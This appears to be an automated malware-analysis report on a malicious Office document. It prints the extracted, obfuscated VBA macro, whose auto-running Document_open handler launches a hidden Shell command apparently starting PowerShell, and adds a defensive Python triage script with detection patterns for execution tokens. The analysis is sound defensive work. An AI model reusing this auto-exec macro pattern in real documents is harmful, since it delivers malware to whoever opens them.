Verdict: MALICIOUS (Risk Score 262)

MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic; T1204.002 User Execution: Malicious File

Malware Insights
The sample is a malicious OLE (legacy binary Office) document containing a VBA macro. Its 'Document_open' handler runs automatically when the document is opened and calls the function 'huQWaidES', which ends in a 'VBA.Shell()' call, the critical finding: execution of an arbitrary command. The obfuscation is padding rather than encoding: nearly every statement is junk arithmetic on undeclared variables, and 'On Error Resume Next' swallows the resulting errors, so the Shell() call is the only operative line. Its command string is concatenated from fragments, most of them undeclared variables that the extracted source never assigns. The two recoverable pieces, the literal "owers" and Chr(DuqCroSPz + vbKeyP + vVztTjhcZs), which evaluates to "P" (vbKeyP is 80, and the undeclared terms are Empty, i.e. 0), are consistent with a PowerShell launcher, but the rest of the command cannot be read from the source alone. The second argument, 1837 - 1837 = 0 (vbHide), runs the child process without a visible window. The ClamAV detection name 'Doc.Malware.Valyria-6874636-0' suggests the command downloads and executes a second-stage payload; this is inferred from the signature, since no download URL is recoverable from the document (the only extracted URL is the DrawingML schema namespace that ordinary Office documents also carry). The large unallocated slack region flagged below is a lead for carving rather than a detection on its own, since re-saved documents also leave slack behind.
Heuristics (7)

- ClamAV: Doc.Malware.Valyria-6874636-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6874636-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): OLE file is 103,424 bytes but its declared streams total only 57,355 bytes — 46,069 bytes (45%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2115 bytes |

SHA-256: 2437dade82b90d9b3ad727575d7dee1cc4bf8ce10624f7e70ee48689b8c8b122

Preview (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "WnhUMPbktu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function huQWaidES()
On Error Resume Next
AqNrEU = 10958 + HISku
qdViX = (26648 * Sgn(buWhGP) / 95749 / OvHwCH * FFOZi + ChrW(RGGmFn) / imnMj * CInt(VhjiE))
wbDMLX = QZGlRP
XNsqf = Rnd(rIRZw)
wjrJo = 32268 + AbkTcI
RtimGW = (43905 * Sgn(wMLtP) / 67360 / jOziD * ENXtzp + ChrW(iDaCt) / dHzwMF * CInt(hTnboI))
QzmhYa = QfQHu
wSKLd = Rnd(MJaYQ)
ftlIz = 53836 + wjPmc
sQbqF = (10833 * Sgn(VBaBS) / 77357 / mIACdw * ubFKn + ChrW(kNhHa) / wjoVsJ * CInt(EwzLYd))
AlavF = zCzlKd
FkRQZr = Rnd(MfGsHh)
pnITS = 52299 + qzzmIs
wVlzzM = (83030 * Sgn(Rofszq) / 51458 / MHork * zDZowv + ChrW(Noivho) / MwnvB * CInt(aoPXk))
rcvQhh = GZTkX
JKuzj = Rnd(hcwpWj)
huQWaidES = HOzfXt + VBA.Shell(vnBsN + Chr(DuqCroSPz + vbKeyP + vVztTjhcZs) + "owers" + QomLwriF + jKuBhYc + DoPRzTDjiBz + DhYpTKZc + NNIZaCuJqJP, 1837 - 1837)
vJDzz = 94368 + CFzOT
OYfziY = (57193 * Sgn(GuXoSa) / 39490 / puwsCq * uJtZFF + ChrW(VCWJir) / GVqpK * CInt(mrWVak))
pjOLnB = IzoBc
vuMMvj = Rnd(JVhaK)
dKZVS = 15701 + cRjYIC
KwlQk = (82689 * Sgn(hYMWE) / 26305 / HCaVuh * QEiCMA + ChrW(sYwVf) / ijfSoR * CInt(KidjiK))
HqCmYw = klbzm
JuCkk = Rnd(vlpkz)
End Function
Private Sub Document_open()
On Error Resume Next
qOozO = 2083 + izaWI
QaBopc = (8497 * Sgn(bXViP) / 59887 / fQnLD * cJwMQ + ChrW(tVFYi) / VlwcLl * CInt(DRBYMw))
cwihbC = CkpKN
NiLFF = Rnd(jurDO)
bKuVw = 82105 + tuJCEB
jbBzh = (49013 * Sgn(LSsXjZ) / 42397 / RcCUP * jLMMj + ChrW(NVzdu) / cKVswc * CInt(UqzGku))
zHakl = Edhzl
XLWTC = Rnd(KUnRDb)
huQWaidES
HWqUP = 54100 + wLfZjZ
MHKGD = (22329 * Sgn(VwzfrI) / 93607 / DjMUF * cLSKMS + ChrW(FUIXRL) / pBZWUw * CInt(vKBNT))
uKjEcS = CBiwz
PMmAf = Rnd(WVzPpk)
wPdrHZ = 92870 + YCHqz
jBtJd = (62353 * Sgn(BGSTtn) / 45402 / ivNfc * LDvawz + ChrW(aHdEMz) / KftdJ * CInt(GKOjX))
RjARz = wWHAmv
HwUVc = Rnd(cjwrvq)
End Sub
```
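The following Python is an added example, not part of this report or of the analyzer's own code. It reproduces the source-level logic behind the OLE_VBA_DOCOPEN and OLE_VBA_SHELL findings (an auto-execution entry point plus a Shell() call) over a constructed excerpt of the carved macro, and makes a best-effort reconstruction of the Shell() arguments: string literals are kept, Chr() of constant arithmetic is resolved, and everything else is marked unknown. The token lists, the treatment of undeclared identifiers as Empty (0) and the sample excerpt are this example's own assumptions; vbKeyP = 80 and the WindowStyle values are the real VBA constants.

```python
"""Added example: olevba-style triage of extracted VBA source (auto-exec + Shell())."""
import ast
import re

# Constructed excerpt of the macro carved from this sample: the Shell() line is copied
# from the report's preview, the junk arithmetic around it is trimmed.
SAMPLE_VBA = '''Attribute VB_Name = "WnhUMPbktu"
Function huQWaidES()
On Error Resume Next
AqNrEU = 10958 + HISku
huQWaidES = HOzfXt + VBA.Shell(vnBsN + Chr(DuqCroSPz + vbKeyP + vVztTjhcZs) + "owers" + QomLwriF + jKuBhYc + DoPRzTDjiBz + DhYpTKZc + NNIZaCuJqJP, 1837 - 1837)
End Function
Private Sub Document_open()
On Error Resume Next
qOozO = 2083 + izaWI
huQWaidES
End Sub
'''

# Auto-execution entry points and execution tokens (this example's own lists, a subset of olevba's).
AUTOEXEC_RE = re.compile(r'\b(Auto_?Open|Auto_?Exec|Auto_?Close|Document_Open|Document_Close|'
                         r'Workbook_Open|Workbook_Activate)\b', re.I)
EXEC_RE = re.compile(r'\b(Shell|WScript\.Shell|CreateObject|ShellExecute|URLDownloadToFile|'
                     r'powershell|cmd)\b', re.I)
SHELL_CALL_RE = re.compile(r'\bShell\s*\((.*)\)', re.I)
# Shell()'s optional WindowStyle argument; vbHide (0) runs the child with no visible window.
WINDOW_STYLES = {0: 'vbHide', 1: 'vbNormalFocus', 2: 'vbMinimizedFocus',
                 3: 'vbMaximizedFocus', 4: 'vbNormalNoFocus', 6: 'vbMinimizedNoFocus'}
# Built-in VBA constants the obfuscator leans on (vbKeyP = 80, the key code for "P").
# Assumption: any undeclared identifier is Empty, which VBA coerces to 0 in arithmetic.
VBA_CONSTS = {'vbKeyP': 80}


def split_top_level(text, seps):
    """Split on any char in `seps`, but only at parenthesis depth 0 and outside "..." literals."""
    parts, buf, depth, in_str = [], '', 0, False
    for ch in text:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == '(':
                depth += 1
            elif ch == ')':
                depth -= 1
            elif ch in seps and depth == 0:
                parts.append(buf.strip())
                buf = ''
                continue
        buf += ch
    parts.append(buf.strip())
    return parts


def eval_vba_int(expr):
    """Evaluate a VBA integer expression made of literals, identifiers and + - * /.
    Those operators share Python's syntax, so a whitelisted AST walk is enough (no eval()).
    Returns None for anything outside that subset, e.g. function calls like Sgn()."""
    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.Name):
            return VBA_CONSTS.get(node.id, 0)
        if isinstance(node, ast.BinOp):
            left, right = walk(node.left), walk(node.right)
            if isinstance(node.op, ast.Add):
                return left + right
            if isinstance(node.op, ast.Sub):
                return left - right
            if isinstance(node.op, ast.Mult):
                return left * right
            if isinstance(node.op, ast.Div):
                return left / right
        raise ValueError('unsupported VBA expression')
    try:
        return int(walk(ast.parse(expr.strip(), mode='eval').body))
    except (SyntaxError, ValueError, ZeroDivisionError):
        return None


def render_fragment(frag):
    """Turn one piece of a concatenated command string into text; '?' marks an unresolved piece."""
    if len(frag) >= 2 and frag[0] == '"' and frag[-1] == '"':
        return frag[1:-1]
    m = re.fullmatch(r'Chr\s*\((.*)\)', frag, re.I | re.S)
    if m:
        code = eval_vba_int(m.group(1))
        return chr(code) if code is not None and 0 <= code < 256 else '?'
    return '?'


def triage_vba(source):
    """Flag auto-exec + Shell() (the report's critical finding) and rebuild each Shell() call."""
    findings = {
        'autoexec': sorted({m.group(1) for m in AUTOEXEC_RE.finditer(source)}, key=str.lower),
        'exec_tokens': sorted({m.group(1) for m in EXEC_RE.finditer(source)}, key=str.lower),
        'shell_calls': [],
    }
    for m in SHELL_CALL_RE.finditer(source):
        args = split_top_level(m.group(1), ',')
        command = ''.join(render_fragment(f) for f in split_top_level(args[0], '+&'))
        style = eval_vba_int(args[1]) if len(args) > 1 else 1  # VBA default is vbNormalFocus
        findings['shell_calls'].append(
            {'command': command, 'window_style': WINDOW_STYLES.get(style, repr(style))})
    findings['verdict'] = ('critical' if findings['autoexec'] and findings['shell_calls']
                           else 'review')
    return findings


if __name__ == '__main__':
    import json
    print(json.dumps(triage_vba(SAMPLE_VBA), indent=2))
```

On the excerpt this yields the auto-exec trigger 'Document_open', one Shell() call with window style vbHide, and the partial command "?Powers?????", which is as far as the extracted source lets an analyst go; the unknown fragments would have to come from a sandbox run or from wherever the obfuscator populates those variables. The AST walk matters because feeding attacker-controlled expression text to Python's eval() would turn a triage script into a code-execution sink.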